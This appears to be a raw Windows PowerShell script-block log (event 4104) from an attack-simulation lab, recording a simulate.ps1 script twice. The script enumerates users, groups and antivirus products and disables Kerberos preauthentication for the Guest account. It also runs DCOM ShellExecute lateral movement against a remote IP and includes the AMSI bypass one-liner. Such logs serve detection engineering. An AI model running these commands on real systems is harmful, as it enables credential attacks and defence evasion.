4104132150x0101353Microsoft-Windows-PowerShell/Operationalwin-dc-tcontreras-attack-range-677.attackrange.local11Get-LocalUser | Out-File -FilePath .\localUser.txt; Get-ADUserResultantPasswordPolicy -Identity Administrator | Out-File -FilePath .\PasswordPolicy.txt; Get-ADuser Guest | Set-ADAccountControl -DoesNotRequirePreAuth:$true; Get-ADDefaultDomainPasswordPolicy | Out-File -FilePath .\ADDefaultPassPolicy.txt;Enter-PSSession -ComputerName ar-win-dc-default-attack-range;[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt;$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append;[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt;get-wmiobject win32_group | Out-File -FilePath .\DomainGroup.txt;$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")); $item = $o.Item() ; $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0);[activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","10.0.1.16")).Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0); Get-AdComputer -Filter * | Out-File -FilePath .\AdComputer.txt;[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);Invoke-Command -ComputerName ar-win-dc-default-attack-range -ScriptBlock {ipconfig};Get-WmiObject -Query “SELECT * FROM AntiSpywareProduct”;Get-WmiObject -Query “SELECT * FROM AntiVirusProduct”;get-wmiobject Win32_ComputerSystemProducta4de67dc-2c1f-4ed7-85bd-4fba124ed6e2C:\Temp\simulate.ps1 4104132150x0101093Microsoft-Windows-PowerShell/Operationalwin-dc-tcontreras-attack-range-677.attackrange.local11Get-LocalUser | Out-File -FilePath .\localUser.txt Get-ADUserResultantPasswordPolicy -Identity Administrator | Out-File -FilePath .\PasswordPolicy.txt Get-ADuser Guest | Set-ADAccountControl -DoesNotRequirePreAuth:$true Get-ADDefaultDomainPasswordPolicy | Out-File -FilePath .\ADDefaultPassPolicy.txt Enter-PSSession -ComputerName ar-win-dc-default-attack-range [System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt $env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append [System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt get-wmiobject win32_group | Out-File -FilePath .\DomainGroup.txt $o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")) $item = $o.Item() $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","10.0.1.16")).Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) powershell.exe Get-AdComputer -Filter * | Out-File -FilePath .\AdComputer.txt [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) Invoke-Command -ComputerName ar-win-dc-default-tcontreras-attack-range -ScriptBlock {ipconfig} Get-WmiObject -Query “SELECT * FROM AntiSpywareProduct” Get-WmiObject -Query “SELECT * FROM AntiVirusProduct” get-wmiobject Win32_ComputerSystemProduct5b113130-9a93-41be-b3c4-f38d1d313ea5C:\Temp\simulate.ps1